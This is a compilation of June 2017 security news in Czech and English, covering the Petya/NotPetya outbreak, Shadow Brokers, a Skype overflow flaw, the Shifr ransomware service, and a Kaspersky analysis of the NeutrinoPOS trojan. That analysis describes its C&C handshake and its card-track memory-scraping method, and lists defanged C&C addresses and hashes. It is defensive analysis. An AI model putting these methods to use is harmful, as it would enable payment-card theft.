Petya na rozdíl od WannaCry a větší části tzv. ransomware nešifruje jednotlivé soubory na disku, ale MBR (Master Boot Record). Systém tak ztratí přístup ke spouštěcímu záznamu a místo nastartování systému je uživateli po restartu počítače zobrazen pouze požadavek výkupného. Až v případě, že tento mechanismus selže, začne Petya šifrovat i další soubory na disku.

Tento princip fungování je na jednu stranu zákeřný svou rychlostí – zašifrovat miniaturní MBR záznam je otázkou několika sekund. Na druhou stranu nejsou nijak poškozena samotná data a v případě, že není zahájen proces jejich šifrování, je možné soubory získat po vložení disku do neinfikovaného stroje.

Výzva zobrazena po zašifrování souborů.

Ačkoliv by se mohlo zdát, že při takto masivním rozšíření musí být ransomware pro útočníky zlatým dolem, většinou je tomu naopak. K opravdovému zaplacení výkupného se odhodlá jen zlomek obětí. V tomto případě si podle výpisu transakcí v bitocinové peněžence přišli útočníci asi na 9 250 dolarů, což je v přepočtu asi 214 tisíc korun. Vzhledem k tomu, že požadují asi 300 dolarů po každé oběti, zaplatilo maximálně 30 postižených.

Eset nejspíše odhalil nebezpečnou ruskou kyberzbraň. Možná nás všechny odpojí od elektřiny
Eset nejspíše odhalil nebezpečnou ruskou kyberzbraň. Možná nás všechny odpojí od elektřiny
Bizarní je však systém, jakým chtěli útočníci od obětí získávat peníze. Vše mělo být postaveno pouze na e-mailové konverzaci, kdy schránku provozovali na německé službě Posteo. Ta jim však byla brzy zablokována a oběti se tak s útočníky ani nemohou spojit. Žádný velký byznys to tedy z pohledu útočníků není.

Výzva zobrazena po zašifrování souborů.

Pokud se do vašeho systému ransomware postavený na vzorku Win32/Diskcoder.C, nejlepší reakcí je okamžité vypnutí počítače. Zatímco zašifrování spouštěcího záznamu trvá jen několik sekund, znepřístupnění dalších dat může zabrat i několik hodin. Proto je nutné po restartu počítače (který Petya vyžaduje) jej ihned vypnout. Právě v tomto okamžiku totiž zobrazí požadavek výkupného a započne šifrování dalších dat.

Zákeřná Karmen: Tento ransomware by dokázala ovládat i vaše babička
Zákeřná Karmen: Tento ransomware by dokázala ovládat i vaše babička
Opět však musíme připomenout především nutnost automatických aktualizací systému. Ty odstraní většinu bezpečnostních děr dřív, než je mohou útočníci zneužít. V případě malwaru šířeného pomocí nezáplatovaného SMB je provozování neaktualizovaného systému navíc značně nezodpovědné. Snadno může dojít k infekci dalších počítačů v síti.


Ukrajina a další země čelí nevídanému kybernetickému útoku. Kdosi útočí na banky, vládu, čerpací stanice i energetiku
28.6.2017 Živě.cz
BigBrother
Aktualizováno: Zdá se, že terčem útoku nebyla pouze Ukrajina, podobnou aktivitu neznámých záškodníků totiž hlásí i některé velké společnosti mimo zemi. Wall Street Journal píše třeba o lodní společnosti A.P. Moeller-Maersk A/S, reklamní korporaci WPP Group PLC a na seznamu cílů je i ruský ropný PAO Rosneft.

Ukrajina se dle tamních médií v posledních hodinách potýká s masivním kybernetickým útokem, který zasáhl jak počítačovou síť vlády, tak některé bankovní systémy. Podle ukrajinského zpravodajského webu RBC, nefungovaly v důsledku útoků některé bankovní zákaznické systémy a zpomalily se běžné převody a další operace.

Na pád počítačů si postěžoval i vicepremiér Pavlo Roženko, který na svém facebookovém účtu vystavil všeříkající fotografii znázorňující kontrolu diskových oddílů Windows.

Další obětí se měly stát ukrajinské energetické společnosti Kyivenergo a Ukenergo, jejíž webové stránky jsou nedostupné. Problémy hlásí i letiště Boryspil, síť čerpacích stanic WOG a několik dalších organizací.

Jedná se o nejmasivnější útok za poslední dobu. Ukrajinské úřady se naposledy potýkaly s výpadkem elektrické sítě loni v zimě, který způsobili také hackeři, a antivirové společnosti po rozsáhlém auditu varovaly, že se mohlo jednat pouze o technologickou zkoušku a zemi čeká mnohem masivnější útok.


The Dark Art of Encryption
28.6.2017 securityaffairs Krypto

The current crisis of encryption is in part due to a lack of intelligence. The governments of the UK and Australia are talking about bans, regulations, requirements and other legal structures to address the perceived problem of “going dark”.
The problem, inside the nutshells that are the May and Turnbull governments, is that encryption allows [evil-doer name fill in the blank here] to communicate where the legal authorities cannot monitor them. Thus, due to the lack of intelligence, the May and Turnbull governments propose to find some way to regulate encryption.

When I mention lack of “intelligence” I am not making reference to the collection of information of military or political value. I am using intelligence in the traditional form of the ability to acquire and apply knowledge. To those who have been placed, elected or seized power, understanding the technology is less important than trying to wrestle with its consequences.

Thus, for arguments sake, I will try to keep this simple for the simple minded leadership. If the value 1 represents your message and the value 4 represents the secret code key then 1 plus 4 will give you the coded message 5. To decode the secret message simply apply the reverse by subtracting the secret code key 4 from the secret message 5 and you obtain the original message 1. As shown below:

SIMPLE ENCRYPTION

1 = message
4 = code key
1 + 4 = 5 coded message
5 – 4 = 1 decoded message

The question for the political and ruling caste is – exactly how are you going to regulate that?

The obvious answer is you can’t. Thus, the dilemma the ruling elite have found. In order to stop the [evil-doer name fill in the blank here] from using encryption you must ban math and pray the bad guys have not already graduated from elementary school.

It would seem that to ban encryption is a futile effort. However, that does not seem to stop the clueless political caste from trying. It is almost like Galileo fighting the Pope. Yes, I understand the church is all powerful and can cut my head off but that still doesn’t stop the Earth from revolving around the sun.

Thus, the ruling caste has focused their bans toward the so-called providers such as WhatsApp, Telegram, Signal and others. The problem with this selected approach is that all you do is stop the general public from having the advantages of encryption while the evil-doers will simply cook up their own, something that ISIS and Al Qaeda have already done.

What does the May and Turnbull governments get out of this fruitless endeavor? Not much other than use the boogie man “technology” as a way of scooping up some of the ignorant voters into thinking they are safe… until the next attack. Simply put, they are playing on the technophobia of the public which is often mirrored in their own technophobia at failing to understand what can be explained with a first grade math problem.

In fact, even the more totalitarian minded regimes in Moscow and Beijing are rapidly growing frustrated at their inability to regulate math. It would seem that the general public in all nations are better served if the master wasn’t always clued in on everything being said behind their backs. So far the only government on Earth which seems capable to addressing the problem is North Korea where all users are registered and all computers are closely monitored.

Therein lies part two of the problem of encryption. The academic and information security communities have long kept the encryption magic in a special box away from the public. It is this form of wizard artful dodging that has created the clueless elite and even more clueless users.

Many in both technical communities act like elite snobs of their own caste, refusing to use any encryption that has not been “verified” by open source code. This is ironic since they demand the encryption code to be open and free for all to use (steal) while the computer operating systems code they are designed to run on remains proprietary and a very closely guarded secret. It is similar to demanding to know the exact molecular makeup of the ketchup for your 12 course dinner which is being prepared by a secret team of chefs using secret ingredients and classified cooking methods.

The other part revolves around the geek fad syndrome of wizards. The latest fancy of super-duper code systems has often resulted in getting people burned. The community went gaga over the Dual Elliptical Curve encryption security and even allowed the US government to turn it into a standard, little knowing that the NSA had already broken the coding system. Thus, the fad syndrome laid the foundation for a whole generation of obsolete and vulnerable hardware and software.

All this brings us back to the heart of the 12 course meal – your computer operating system. The source code to your operating system, with few exceptions, is not available and for all practical purposes remains a black-box. This box has been hacked twelve times over since last Sunday. Many of the hacks are done by the very same “intelligence” agencies now demanding the easy – but useless – solution of banning encryption.

Unfortunately, these boxes are now hooking up to all sorts of things like airplanes, the power grid, water plants, sewage facilities, the stock markets, cars and even the lowly toaster. They also hook up to things like nuclear power plants and major weapon systems like missiles, bombers, and aircraft carriers. The recent CIA hacks put on for display by Wikileaks are a clear demonstration that the digital world we have built is only as safe as the boxes and their security systems.

The only chance we have is to encrypt as much as possible or we are doomed. The only way to survive in the future may be to go dark.

“A dark world where nuclear power plants can’t be hacked is safer than a bright world in which they can,” Bruce Schneier.


Akamai Launches New DNS Security Product

28.6.2017 securityweek Safety
Content delivery network and cloud services provider Akamai announced on Tuesday the launch of a new product designed to protect enterprises against malware, phishing and data exfiltration attempts through the analysis of DNS requests.

The new solution, Enterprise Threat Protector, aims to address the risks associated with DNS communications. According to Akamai, the product leverages threat data from the company’s Cloud Security Intelligence system to determine the “intent” of DNS requests and detect potentially targeted attacks.

Enterprise Threat Protector analyzes an organization’s recursive DNS requests and blocks connections to domains associated with suspicious or malicious activity, including malware drop sites, ransomware, and phishing pages.Akamai logo

Akamai says the product can also disrupt communications between infected hosts and command and control (C&C) servers. It’s not uncommon for malware to rely on DNS for data exfiltration and Enterprise Threat Protector should prevent attempts to send data outside the protected organization.

Security teams can also utilize the new product to improve compliance and enforce acceptable use policies.

Since Enterprise Threat Protector is a cloud-based solution, it’s highly scalable and it can be configured and deployed within minutes without the need for new hardware or complex changes to the network.

"Our customers' security teams are facing adversaries that consistently shift attack tactics and vectors, specifically seek out gaps in defenses and can be incredibly persistent in attempts to find weaknesses in a company's security posture. Enterprises need quick-to-deploy and easy-to-manage cloud-based solutions that can address these unique issues as part of their overall security strategy," said John Summers, vice president and general manager of Enterprise Products at Akamai. "With Enterprise Threat Protector, we're providing our customers with a powerful, intelligent solution that can help detect and stop targeted attacks in their tracks."


'Shadow Brokers' Threatens to Unmask A Hacker Who Worked With NSA
28.6.2017 thehackernews BigBrothers
The Shadow Brokers, a notorious hacking group that leaked US cyberweapons — which were also abused by the recent ransomware disasters WannaCry and Petya or NotPetya — has now threatened to unmask the identity of a former hacker who worked for the NSA.
Besides this, the Shadow Brokers group has also doubled the price for its monthly subscription model of NSA's built hacking tools and zero-day exploits from 100 ZEC (Zcash) to 200 ZEC, which is around $64,400 USD.
Moreover, the hacking group has also announced a VIP service for people, who will be entertained by the group for their queries on the leaked hacking tools and exploits.
To subscribe to the VIP service, one has to make a one-time payment of 400 ZEC (around US$128,800).
Last month, the Shadow Brokers announced to release more zero-days exploits and hacking tools developed by the US spy agency every month from June 2017, but only to private members who will subscribe for receiving exclusive access to the future leaks.
The Shadow Brokers' June data dump costs 100 ZEC, but after looking at successful growth in the number of subscribers for this month, the group said it is raising the price for the next month's subscription.
Threatens to Unmask Equation Group Hacker
In typically broken English, the mysterious hacking group threatened to unmask a former member of the NSA's elite hacking group called Equation Group, who developed several hacking tools to break into Chinese organizations.
The Shadow Brokers did not reveal much about the former Equation Group member, expect that the person is living in Hawaii and currently a "co-founder of a new security company and is having much venture capital."
The group, who called the NSA Equation Group member as "doctor," threatened because of his/her "ugly tweets" targeting the Shadow Brokers.
"TheShadowBrokers is having special invitation message for 'doctor' person theshadowbrokers is meeting on Twitter. 'Doctor' person is writing ugly tweets to theshadowbrokers," the group said. "Then doctor person is deleting ugly tweets, maybe too much drinking and tweeting?"
"TheShadowBrokers is hoping 'doctor' person is deciding to subscribe to dump service in July. If theshadowbrokers is not seeing subscription payment with corporate email address of doctor@newsecuritycompany.com then theshadowbrokers might be taking tweets personally and dumping data of 'doctor' persons hacks of China with real id and security company name."
Well, that's enough of a threat.
Since June is going to end, it seems like the Shadow Brokers subscribers who paid in June will start receiving zero-day exploit and hacking tools from the first week of July.
Although what the June dump would contain is not clear at the moment, the group's last announcement claimed that the upcoming data dump would include:
Compromised data from banks and Swift providers.
Exploits for operating systems, including Windows 10.
Exploits for web browsers, routers, and smartphones.
Stolen network information from Russian, Chinese, Iranian, and North Korean nuclear missile programs.
You can follow The Hacker News (on Facebook or Twitter) to receive the threat latest updates immediately.


Critical Skype Bug Lets Hackers Remotely Execute Malicious Code
28.6.2017 thehackernews 
Vulnerebility
A critical vulnerability has been discovered in Microsoft-owned most popular free web messaging and voice calling service Skype that could allow hackers to remotely execute malicious code and crash systems.
Skype is a free online service that allows users to communicate with peers by voice, video, and instant messaging over the Internet. The service was acquired by Microsoft Corporation in May 2011 for US$8.5 Billion due to its worldwide popularity.
Security researcher Benjamin Kunz-Mejri from Germany-based security firm Vulnerability Lab discovered the previously unknown stack buffer overflow vulnerability, which is documented in CVE-2017-9948, in Skype Web's messaging and call service during a team conference call.
The vulnerability is considered a high-security risk with a 7.2 CVSS score and affects Skype versions 7.2, 7.35, and 7.36 on Windows XP, Windows 7 and Windows 8, Mejri said in a public security disclosure published on Monday.
"The issue can be exploited remotely via session or by local interaction. The problem is located in the print clipboard format & cache transmit via remote session on Windows XP, Windows 7, Windows 8 and Windows 10. In Skype v7.37 the vulnerability is patched," the security firm wrote.
No User Interaction Needed
What's worst? The stack buffer overflow vulnerability doesn't require any user interaction, and only require a low privilege Skype user account.
So, an attacker can remotely crash the application "with an unexpected exception error, to overwrite the active process registers," or even execute malicious code on a target system running the vulnerable Skype version.
The issue resides in the way Skype uses the 'MSFTEDIT.DLL' file in case of a copy request on local systems.
Here's How Attackers can Exploit this Flaw
According to the vulnerability report, attackers can craft a malicious image file and then copy and paste it from a clipboard of a computer system into a conversation window in the Skype application.
Once this image is hosted on a clipboard on both the remote and the local systems, Skype experiences a stack buffer overflow, causing errors and crashing the application, which left the door open for more exploits.
"The limitation of the transmitted size and count for images via print of the remote session clipboard has no secure limitations or restrictions. Attackers [can] crash the software with one request to overwrite the EIP register of the active software process," researchers from Vulnerability Lab says.
"Thus allows local or remote attackers to execute own codes on the affected and connected computer systems via the Skype software," they added.
Proof-of-Concept Code Released
The security firm has also provided proof-of-concept (PoC) exploit code that you can use to test the flaw.

 

Vulnerability Lab reported the flaw to Microsoft on 16th May, and Microsoft fixed the issue and rolled out a patch on 8 June in Skype version 7.37.178.
If you are Skype user, make sure that you run the latest version of the application on your system in order to protect themselves from cyber attacks based on this vulnerability.


Další velký útok ransomwaru zasáhl nezáplatované počítače. Nejvíce je postižena Ukrajina

28.6.2017 CNEWS.cz Viry
Útok je globální a napadá počítače různých institucí.

Včera večer bezpečnostní firmy informovaly o novém masivním útoku ransomwaru, který byl zahájen 27. června v odpoledních hodinách. Ačkoli je jde o globální akci, nejvíce jsou postiženy instituce v Ukrajině. Kromě řady různých soukromých firem byly zasaženy banky, energetické firmy, dopravní služby, ale také vláda.

Podle Esetu k dalším výrazněji postiženým patří Itálie, Izrael či Srbsko. Avast uvádí, že rychle přibývají výskyty v Rusku, Indii, Francii, Španělsku a Nizozemsku. Ransomware řádí též ve střední Evropě. České republika je devátým nejvíce zasaženým státem. Bezpečnostní experti a expertky odhadují, že se jedná o variantu škodlivého kódu s názvem Petya.

„Nový ransomware připomíná známý škodlivý kód Petya. Když se mu podaří infiltrovat do MBR (Master boot record), hlavního spouštěcího záznamu počítače, zašifruje celý disk. V opačném případě šifruje jednotlivé soubory, stejně jako ransomware Mischa,“ říká Robert Lipovský, analytik z Esetu. Podle této firmy je za data požadováno výkupné ve výši 300 dolarů. (Odpovídající částka je požadována v Bitcoinech.) Malware identifikuje jako Win32/Diskcoder.C Trojan.

„V současné době jsme zastavili 12 000 pokusů o útok této modifikace ransomwaru Petya, který zneužívá exploitu EternalBlue. Z našich dat také víme, že 38 milionů počítačů, které jsme zkontrolovali minulý týden, dosud nemají záplatovaný svůj software a jsou tedy potenciálně snadno zranitelné. Skutečný počet snadno napadnutelných počítačů ale bude ještě vyšší,“ uvádí Jakub Křoustek, bezpečnostní expert z Avastu.


Fabian RODES @FabianRODES
«Maman, pourquoi les gens ils quittent l'avion … pourquoi le film il marche plus !» #petya
19:21, 27. Jun. 2017
119 119 retweetů 65 65lajků
Twitter Ads info and privacy
Použité zranitelné místo

Ve hře je tedy opět díra v protokolu SMB, kterou nedávno zneužíval WannaCry. Záplata pro SMB je k dispozici od března, zjevně ale řada počítačů stále záplatována není. Mimochodem, Microsoft z Windows bude postupně odebírat protokol SMB1.

Nástroje využité při útoku

Současně je při útoku používán PsExec, nástroj na vzdálenou instalaci softwaru. Podle Check Pointu se do útoku možná zapojil také Loki Bot, jenž se zaměřuje na odcizování přihlašovacích údajů. Tímto malwarem se můžete nakazit přes upravený dokument RTF, jenž pomocí skriptu stáhne samotný malware. Zapojení Loki Botu je ale zatím nepotvrzené.

Průběh šíření infekce v lokální síti

Když Petya pronikne na počítač, proskenuje lokální síť pomocí žádosti protokolu ARP. Pomocí protokolu SMB pak komunikuje se stroji v této síti (které odpovídají), později zahájí ještě komunikaci pomocí protokolu HTTP. Komunikace končí v momentě, kdy jsou stroje zašifrovány. Takto v kostce průběh útoku popisuje Check Point.

Ransomware Petya žádá o výkupné (foto: Avast)
Ransomware Petya žádá o výkupné (foto: Avast)
Závěr

Snímek obrazovky počítače po napadení ransomwarem nám nabídl Avast. Aktuální informace na Twitteru sdílela mj. Kateryna Kruk, známá politická aktivistka a politoložka. V jednom příspěvku popisuje, že její otec nemohl na čerpací stanici natankovat palivo. Potíže mělo např. také kijevské metro, jež nepřijímalo platební karty.

Co dodat? Kybernetické útoky mohou vážně narušit běžný život. Svět se přitom zřejmě od posledního útoku nepoučil dostatečně a instalace záplat je stále podceňována. Podceňovány mohou být také některé zásady bezpečnosti.

Sledovat
Kateryna_Kruk @Kateryna_Kruk
Just called my father. He says he couldn't buy fuel at a petrol station, the system is shut down.
Everyone is disoriented.
15:26, 27. Jun. 2017
76 76 retweetů 35 35lajků
Twitter Ads info and privacy
Sledovat
ArianaGic/Аріянॳць @GicAriana
What #Russia has hit in #cyberattack in #Ukraine SO FAR:
Government Ministry
Power grid
Banks
Media
Postal
Airport
Cell/internet providers
14:54, 27. Jun. 2017
67 67 retweetů 29 29lajků
Twitter Ads info and privacy
Sledovat
Kateryna_Kruk @Kateryna_Kruk
National Police was targeted too, but it withstood all attacks.#Ukraine #CyberAttack
15:30, 27. Jun. 2017
6 6 retweetů 9 9lajků
Twitter Ads info and privacy
Sledovat
Kateryna_Kruk @Kateryna_Kruk
New victims in #Ukraine #CyberAttack: Ministry of Interior Affairs, Kyiv City administration, Pension Fund of Ukraine(!!!)
15:22, 27. Jun. 2017
14 14 retweetů 10 10lajků
Twitter Ads info and privacy
Sledovat
Kateryna_Kruk @Kateryna_Kruk
Even #Kyiv metro is under cyber attack. Payments by banking cards aren't accepted. https://twitter.com/kyivmetroalerts/status/879670749149245440 …
14:53, 27. Jun. 2017
12 12 retweetů 2 2lajky
Twitter Ads info and privacy
Mimochodem, pamatujete na Microsoft, který nedávno uvolnil určité záplaty také pro své nepodporované operační systémy Windows Vista a XP? Tvrdil, že ví o blížícím se útoku. Jednalo se o opatření namířené právě proti včerejšímu globálnímu výskytu modifikovaného ransomwaru Petya? To zatím nevíme.


Masivní kybernetický útok nevyšel. Útočníci kvůli školácké chybě nevydělají ani korunu

28.6.2017 Novinky/Bezpečnost Viry
V úterý se začal internetem jako lavina šířit nový vyděračský virus Win32/Diskcoder.C Trojan. Útočníkům se však tento škodlivý kód nevyplatí, protože udělali školáckou chybu. Z napadených strojů tak nedostanou ani korunu.

Uživatelé napadení virem místo startu operačního systému uvidí tuto zprávu.
Uživatelé napadení virem místo startu operačního systému uvidí tuto zprávu.
Většina vyděračských virů jsou poměrně sofistikované škodlivé kódy. Po zablokování počítače požadují výkupné, platba z každého napadeného účtu je přitom směřována do jiné bitcoinové peněženky. Vystopovat útočníky je tedy prakticky nemožné a stejně tak není reálné zablokovat jednotlivé transakce. Útočníkům z vyděračských virů plynou často i milióny korun.

V případě ransomwaru Win32/Diskcoder.C Trojan však útočníci tak chytří nebyli. S majiteli napadených počítačů totiž komunikují prostřednictvím e-mailu na serveru posteo.net. V podstatě každý, kdo chce odblokovat počítač, musí útočníkům napsat.

E-mail je zablokovaný
Právě to se ale provozovatelům serveru posteo.net nelíbilo, a tak e-mailovou schránku počítačových pirátů ještě v úterý večer zablokovali, stalo se tak pouhých pár hodin poté, co se vyděračský virus začal šířit internetem.

V současnosti proto prakticky není možné zaplatit výkupné, přestože to útočníci požadují. Už nyní je tak jisté, že i s ohledem na množství napadených strojů nevydělají v současnosti kyberzločinci ani jedinou korunu.

Ransomware Win32/Diskcoder.C Trojan napadl v úterý večer bankovní sektor, energetické i poštovní společnosti. Stejně tak ale útočil i v domácnostech. Nejvíce postižena je Ukrajina, do žebříčku deseti zemí, ve kterých virus řádil nejvíce, se nicméně dostala také Česká republika, jež je aktuálně na deváté příčce žebříčku.

Zákeřný vyděračský virus
Win32/Diskcoder.C Trojan je poměrně zákeřný škodlivý kód. Většina vyděračských virů totiž potřebuje k zašifrování dat na pevném disku poměrně dost času, klidně i několik hodin. Během toho může jejich práci zachytit antivirový program a zablokovat je ještě dříve, než v počítači nadělají nějakou větší neplechu.

Nově objevená hrozba však funguje jiným způsobem. Na disku nezašifruje všechna data, ale pouze tzv. MBR (Master Boot Record). Jde o hlavní spouštěcí záznam, díky kterému se v podstatě spouští celý operační systém. K zašifrovanému záznamu pak počítač nemá přístup a místo Windows spustí jen hlášku o nutnosti zaplatit výkupné.

Na zašifrování MBR nepotřebuje nový vyděračský virus několik hodin, stačí mu pouze pár vteřin. Antiviry tak prakticky nemají šanci škodlivý kód zachytit. Hned po prvním restartu je pak problém na světě.


Počítačový virus zasáhl světové firmy, postižen byl i Černobyl

28.6.2017 Novinky/Bezpečnost Viry
Firmy v řadě evropských zemí se v úterý staly terčem kybernetického útoku. Postižena byla dánská přepravní společnost Maersk či ruský ropný gigant Rosněfť. Obzvláště rozsáhlý byl útok na Ukrajině, kde se terčem stala i jaderná elektrárna Černobyl, pošta, největší distribuční energetická společnost UkrEnergo i centrální banka.
Postižen byl americký nadnárodní potravinářský koncern Mondelez, přední přepravce Maersk, francouzský výrobce stavebnin St. Gobain, ruská ropná společnost Rosněfť, britská reklamní firma WPP či výrobce letadel Antonov.

Akce neidentifikovaných útočníků podle prohlášení napadených institucí na Ukrajině narušily jejich operace. Postižena byla i černobylská jaderná elektrárna, kde podle agentury AFP byli technici nuceni přerušit měření radioaktivity. Mezi dalšími postiženými podniky byla státní pošta, největší státem vlastněná banka Oschad bank, největší energetický distributor UkrEnergo a alespoň částečně i vládní počítačová síť.

Centrální banka uvedla, že se stala terčem „neznámého viru“, a v prohlášení dodala, že věří, že je proti kyberútokům dostatečně zabezpečená. Ruský Rosněfť musel kvůli útoku přejít na rezervní řídicí systém.

Podle agentury Interfax-Ukrajina se virus chová podobně jako vyděračský virus WannaCry, jehož původci po napadených požadovali výkupné. To pro stanici BBC potvrdil i počítačový expert z Univerzity v Surrey Alan Woodward.

„Zdá se, že je to verze vyděračského viru (ransomware), který se objevil loni. Zločinci ho počátkem letošního roku zaktualizovali, když došlo k porážce některých jeho aspektů. Ten ransomware se nazýval Petya a jeho aktualizovaná verze Petrwap,“ uvedl Woodward.


Shifr RaaS lets create a simple ransomware with just 3 steps
28.6.2017 securityaffairs
Ransomware

Over the weekend, security experts discovered a new Ransomware-as-a-Service dubbed Shifr RaaS that allows creating a ransomware compiling 3 form fields.
Ransomware represents a profitable business for crooks, it is normal that the offer of Ransomware-as-a-Service (RaaS) will continue its success in the cyber criminal ecosystem.

Over the weekend, several security experts discovered a new Ransomware-as-a-Service website that allows wannabe cyber criminals to create their own ransomware just by filling in three form fields.

The website was hosted on the Dark Web and customers can pay their ransomware in Bitcoin.

Shifr RaaS

This is probably one of the easiest-to-use RaaS websites, the ransomware was dubbed Shifr due to the extension it appends to the encrypted files and is written in Go.

“We’ve called it Shifr based on the extension it adds to encrypted files, but G Data security researcher Karsten Hahn has told Bleeping Computer that an initial analysis of this new threat reveals clues that Shifr might be related to Trojan.Encoder.6491, the first ever ransomware written in Go, discovered last year by Dr.Web security researchers.” states a blog post published by BleepingComputer.

The process for the creation of the Shifr ransomware is simple, wannabe criminals have to provide the size of the ransom demanded by the malware, a Bitcoin address to handle victims’ payments and then they have to solve a CAPTCHA challenge and press a button.

“While other RaaS portals will ask for an entry fee or verify their clients to ensure only skilled crooks (and not security researchers) get their hands on ransomware samples, this service offers a fully weaponized sample in a few easy steps.” states Catalin Cimpanu from BleepingComputer.

After the deployment of the service, users started submitting Shifr samples to VirusTotal and many antivirus makers are currently detecting them as a threat.

Differently, from other RaaS services, operators behind Shifr maintain for them just 10% of the fee, it nothing is we consider that operators behind the Cerber RaaS keep for them 60% share.

We cannot exclude in this phase that the Shifr RaaS is a scam and that operators will not pay distributors their cuts.

The unique certainly is that the ransomware is not sophisticated and lack of many features, a circumstance that suggests it could be a work in progress project.

The researchers, for example, noticed that the crooks used the same servers to host the payment portal and the RaaS service, it isn’t a good practice.

It is quite easy to predict the rapid diffusion of RaaS services in the next month.


Neutrino modification for POS-terminals
28.6.2017 Kaspersky
Virus

POS MALWARE TROJAN-BANKERS ZEUS
From time to time authors of effective and long-lived Trojans and viruses create new modifications and forks of them, like any other software authors. One of the brightest examples amongst them is Zeus (Trojan-Spy.Win32.Zbot, based on classification of “Kaspersky Lab”), which continues to spawn new modifications of itself each year. In a strange way this malware becomes similar to his prototype from Greek mythology. We can also attribute such malware familes as Mirai, NJRat, Andromeda and so on to this “prolific” group. Malware named “Neutrino” takes an important place in this row of well-known trojans, providing various types of infection, spreading and a useful payload.

In this article we analyze a very special species – a variant which could collect credit card information from POS.

Products of “Kaspersky Lab” detect it as Trojan-Banker.Win32.NeutrinoPOS

MD5 of descripted file: 0CF70BCCFFD1D2B2C9D000DE496D34A1

First stage

The Trojan takes a long “sleep” before it starts. It seems that such code was added to fool some AV sandboxes. To determine the period of delay, the Trojan uses a pseudorandom number generator.
 

C&C Communication

At the next stage, the Trojan extracts a C&C-address list from its body. The list is encoded at Base64. After decoding, the Trojan tries to find a working C&C, using the following algorithm:

Sends POST-request to server, passing through its body encoding in base64 string “enter” (ZW50ZXI=). All encoded strings contains prefix “_wv=”


Working server responds with 404 page, which contains at the end of it encoded string c3VjY2Vzcw== (success). In case of “success”, the rTojan marks the address of the used servers as working.


We should also notice that in the header of each POST-request there is “auth” field, which stays the same for each sample from family NeutrinoPOS.
 

Restored code of C&C-server check
The C&C address stored at registry branch HKCR\Sofrware\alFSVWJBis the same as other variables and data usedby NeutrinoPOS sample. Branch name differs from the one described here, but after full comparison of both samples, we can claim that both samples are the same modification of Neutrino.

C&C Commands

The described variant contains listed functions:

Download and start file;
Make screenshot;
Search process by name;
Change register branches;
Search file by name on infected host and send it to C&C;
Proxy
The server sends commands in plain view, like “PROXY”, “screenshot” and so on, encoded in base64. Following analysis we can claim that in the current versions of Neutrino there is no functions for DDOS attacks.
 

Implementation of command control sum calculating

Examples of few commands (marked with red line on screenshot above):

Rolxor(“PROXY”) = 0xA53EC5C
Rolxor(“screenshot”) = 0xD9FA0E3

NeutrinoPOS command handler
 

Stealing of credit cards

The algorithm for stealing credit card information is implemented in the Trojan in quite a simple way and described as follows:

The Trojans start to work through currently running processes, using CreateToolhelp32Snapshot\ Process32FirstW\Process32NextW.


Using OpenProcess\VirtualQuery\ReadProcessMemory, the Trojan gets information about the memory pages of the process.


The Trojan scans the memory pages for string “Track1”, which marks fields of the first track of the magnetic card. All described fields going one by one:
Sequence of symbols in range from ‘0’ to ‘9’ with length equal to 15, 16 or 19. Sequence checking with Luhn algorithm.

 

Check presence of separation symbol ‘^’ in next and previous fields.
Extract card holder name, with max length, basing on ISO/IEC 7813, equal to 26 symbols:


Rest data (CVC32, expiration date, CVV) extracts as whole block, with check of length and content :


Collected data sends to server with mark “Track1”.
After that, the Trojan starts to extracts next fields with mark “Track2” at the beginning:
At firsts, it extracts PAN with the same checks as on the previous stage.


As separation symbol using ” ‘ ” or ‘D’
Track2 doesn’t contains card holder name — rest data extracts as whole block


Collected data sent to server with mark “Track2”
Distribution Statistics

The largest areas of infection are Russia and Kazakhstan. Nearly 10% of infected computers belong to small business corporate customers.
 

Conclusion

As we can see from the described Trojan Neutrino, despite belonging to an old, well-known and researched family, it continues to bring various surprises to malware analysts and researchers in the form of atypical functionality or application. We can see the same situation with Mirai forks, for example, which generate an enormous count across all platforms and in different species

Generally speaking, all publications of malware source code with good architecture and various functionality will cause interest and attention from malware authors, who will try to use it for nearly all possible ways of illegal money gain. We can assume that right now there may already be new modifications of Neutrino with functionality for crypto-currency mining.

MD5

CECBED938B10A6EEEA21EAF390C149C1

66DFBA01AE6E3AFE914F649E908E9457

4DB70AE71452647E87380786E065F31E

9D70C5CDEDA945CE0F21E76363FE13C5

B682DA77708EE148B914AAEC6F5868E1

5AA0ADBD3D2B98700B51FAFA6DBB43FD

A03BA88F5D70092BE64C8787E7BC47DE

D18ACF99F965D6955E2236645B32C491

3B6211E898B753805581BB41FB483C48

7D28D392BED02F17094929F8EE84234A

C2814C3A0ACB1D87321F9ECFCC54E18C

74404316D9BAB5FF2D3E87CA97DB5F0C

7C6FF28E0C882286FBBC40F27B6AD248

729C89CB125DF6B13FA2666296D11B5A

855D3324F26BE1E3E3F791C29FB06085

2344098C7FA4F859BE1426CE2AD7AE8E

C330C636DE75832B4EC78068BCF0B126

CCBDB9F4561F9565F049E43BEF3E422F

53C557A8BAC43F47F0DEE30FFFE88673

C&C

hxxp://pranavida.cl/director/tasks.php

hxxps://5.101.4.41/panel/tasks.php

hxxps://5.101.4.41/updatepanel/tasks.php

hxxp://jkentnew.5gbfree.com/p/tasks.php

hxxp://124.217.247.72/tasks.php

hxxp://combee84.com/js/css/tasks.php

hxxp://nut29.xsayeszhaifa.bit/newfiz29/logout.php

hxxp://nut29.nsbacknutdoms11war.com/newfiz29/logout.php

hxxp://jbbrother.com/jbb/meaca/obc/pn/tasks.php

hxxp://ns1.posnxqmp.ru/PANEL/tasks.php

hxxp://nut25.nsbacknutdoms11war.com/newfiz25/logout.php

hxxp://propertiesofseyshellseden.com/newfiz21/logout.php

hxxp://n31.propertiesofseyshellseden.com/newfiz31/logout.php

hxxp://propertiesofseyshellseden.com/newfiz21/logout.php

hxxp://n31.propertiesofseyshellseden.com/newfiz31/logout.php


Analýza napadení ransomware: stačí otevřený port RDP a slabé heslo
28.6.2017 Root.cz
Viry
Počátkem letošního roku byl proveden útok ransomwaru na Windows servery několika desítek firem. Situace byla vždy hodně podobná, ráno se začali ozývat uživatelé, že počítačové systémy jsou nedostupné.
Jak probíhalo napadení
Povolaní administrátoři systémů následně zjistili, že veškeré soubory jako dokumenty, obrázky, pdf, txt, rar, zip, kupodivu i exe, atd. ve všech adresářích (mimo adresáře Windows), včetně všech připojených síťových jednotek, jsou zašifrované. Protože většina administrátorů neodpojovala zálohovací zařízení, došlo i na zašifrování záloh. Koncovka upravených souborů se u každé napadené firmy lišila. Někde byla náhodně vygenerovaná, někde měla podobu .wallet. Na ploše serveru Windows bylo upozornění podobného znění:

